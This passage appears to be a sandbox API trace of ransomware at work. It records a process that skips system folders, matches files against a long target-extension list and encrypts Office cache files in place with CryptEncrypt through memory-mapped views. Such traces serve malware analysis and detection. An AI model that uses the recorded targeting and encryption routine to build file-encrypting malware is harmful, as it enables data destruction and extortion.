hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0xc72, dwBufLen=0xc80 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0xc80) returned 1 [0022.649] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0xc80) returned 1 [0022.657] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0022.657] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0022.657] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xca2) returned 0xa0000 [0022.658] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0022.658] CryptHashData (hHash=0x368430, pbData=0xa0c7c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0022.659] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0022.659] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0022.659] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0xca2) returned 1 [0022.659] LocalFree (hMem=0x36ea40) returned 0x0 [0022.659] CryptDestroyHash (hHash=0x368430) returned 1 [0022.659] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0022.659] CloseHandle (hObject=0x230) returned 1 [0022.659] CloseHandle (hObject=0x22c) returned 1 [0022.660] CryptDestroyKey (hKey=0x3683b0) returned 1 [0022.660] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0022.660] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0022.660] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", pszFile="Setup.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" [0022.660] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0022.660] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0022.660] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0022.660] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0022.661] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=4207) returned 1 [0022.661] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1092, lpName=0x0) returned 0x230 [0022.661] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0022.661] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x106f) returned 0xa0000 [0022.662] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0022.662] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x106f) returned 0xa0000 [0022.663] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x106f, dwBufLen=0x1070 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x1070) returned 1 [0022.663] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x1070) returned 1 [0022.665] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0022.665] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0022.665] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1092) returned 0xa0000 [0022.666] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0022.666] CryptHashData (hHash=0x368430, pbData=0xa106c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0022.667] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0022.667] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0022.667] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x1092) returned 1 [0022.667] LocalFree (hMem=0x36ea40) returned 0x0 [0022.667] CryptDestroyHash (hHash=0x368430) returned 1 [0022.667] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0022.667] CloseHandle (hObject=0x230) returned 1 [0022.667] CloseHandle (hObject=0x22c) returned 1 [0022.668] CryptDestroyKey (hKey=0x3683b0) returned 1 [0022.668] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0 [0022.668] FindClose (in: hFindFile=0x368370 | out: hFindFile=0x368370) returned 1 [0022.668] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0022.668] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0022.668] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\MSOCache\\All Users", pszFile="{90140000-001B-0409-1000-0000000FF1CE}-C" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C" [0022.668] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpSrch="\\Windows") returned 0x0 [0022.668] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpSrch="\\Program Files") returned 0x0 [0022.668] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpSrch="\\ProgramData") returned 0x0 [0022.668] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpSrch="\\AppData") returned 0x0 [0022.668] PathCombineW (in: pszDest=0x31ce4e0, pszDir="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*") returned="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*" [0022.668] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0x368370 [0022.669] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0022.669] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0022.669] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0022.669] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0022.669] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0022.669] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", pszFile="Setup.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" [0022.669] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0022.669] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0022.669] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0022.669] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0022.670] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=2424) returned 1 [0022.670] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9a2, lpName=0x0) returned 0x230 [0022.672] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0022.672] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x978) returned 0xa0000 [0022.673] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0022.673] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x978) returned 0xa0000 [0022.674] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x978, dwBufLen=0x980 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x980) returned 1 [0022.674] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x980) returned 1 [0022.676] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0022.676] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0022.676] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9a2) returned 0xa0000 [0022.677] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0022.677] CryptHashData (hHash=0x368430, pbData=0xa097c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0022.677] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0022.677] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0022.677] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x9a2) returned 1 [0022.677] LocalFree (hMem=0x36ea40) returned 0x0 [0022.677] CryptDestroyHash (hHash=0x368430) returned 1 [0022.677] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0022.678] CloseHandle (hObject=0x230) returned 1 [0022.678] CloseHandle (hObject=0x22c) returned 1 [0022.678] CryptDestroyKey (hKey=0x3683b0) returned 1 [0022.678] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0022.678] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0022.678] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", pszFile="WordLR.cab" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" [0022.678] PathFindExtensionW (pszPath="WordLR.cab") returned=".cab" [0022.678] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".cab.") returned=".cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip." [0022.679] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0022.679] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0022.679] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=43806141) returned 1 [0022.679] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x29c6ddf, lpName=0x0) returned 0x230 [0022.679] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0022.679] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x29c0000, dwNumberOfBytesToMap=0x6dbd) returned 0xa0000 [0022.680] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0022.681] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1000000) returned 0x3240000 [0022.681] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3240000*, pdwDataLen=0x31ce070*=0x1000000, dwBufLen=0x29c6dbd | out: pbData=0x3240000*, pdwDataLen=0x31ce070*=0x1000000) returned 1 [0023.505] FlushViewOfFile (lpBaseAddress=0x3240000, dwNumberOfBytesToFlush=0x1000000) returned 1 [0023.660] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0023.756] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0023.756] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x29c0000, dwNumberOfBytesToMap=0x6ddf) returned 0xa0000 [0023.757] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0023.757] CryptHashData (hHash=0x368430, pbData=0xa6db9, dwDataLen=0x4, dwFlags=0x0) returned 1 [0023.757] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0023.757] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0023.757] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x6ddf) returned 1 [0023.758] LocalFree (hMem=0x36ea40) returned 0x0 [0023.758] CryptDestroyHash (hHash=0x368430) returned 1 [0023.758] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0023.758] CloseHandle (hObject=0x230) returned 1 [0023.758] CloseHandle (hObject=0x22c) returned 1 [0023.948] CryptDestroyKey (hKey=0x3683b0) returned 1 [0023.948] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0023.948] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0023.948] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", pszFile="WordMUI.msi" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" [0023.948] PathFindExtensionW (pszPath="WordMUI.msi") returned=".msi" [0023.948] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".msi.") returned 0x0 [0023.949] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0023.949] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0023.949] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", pszFile="WordMUI.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" [0023.949] PathFindExtensionW (pszPath="WordMUI.xml") returned=".xml" [0023.949] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0023.949] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0023.949] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0023.949] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=1800) returned 1 [0023.949] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x732, lpName=0x0) returned 0x230 [0023.949] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0023.949] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x708) returned 0xa0000 [0023.950] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0023.950] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x708) returned 0xa0000 [0023.951] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x708, dwBufLen=0x710 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x710) returned 1 [0023.951] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x710) returned 1 [0023.952] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0023.953] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0023.953] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x732) returned 0xa0000 [0023.954] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0023.954] CryptHashData (hHash=0x368430, pbData=0xa070c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0023.954] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0023.954] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0023.954] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x732) returned 1 [0023.954] LocalFree (hMem=0x36ea40) returned 0x0 [0023.954] CryptDestroyHash (hHash=0x368430) returned 1 [0023.954] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0023.954] CloseHandle (hObject=0x230) returned 1 [0023.954] CloseHandle (hObject=0x22c) returned 1 [0023.955] CryptDestroyKey (hKey=0x3683b0) returned 1 [0023.955] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0 [0023.955] FindClose (in: hFindFile=0x368370 | out: hFindFile=0x368370) returned 1 [0023.955] FindNextFileW (in: 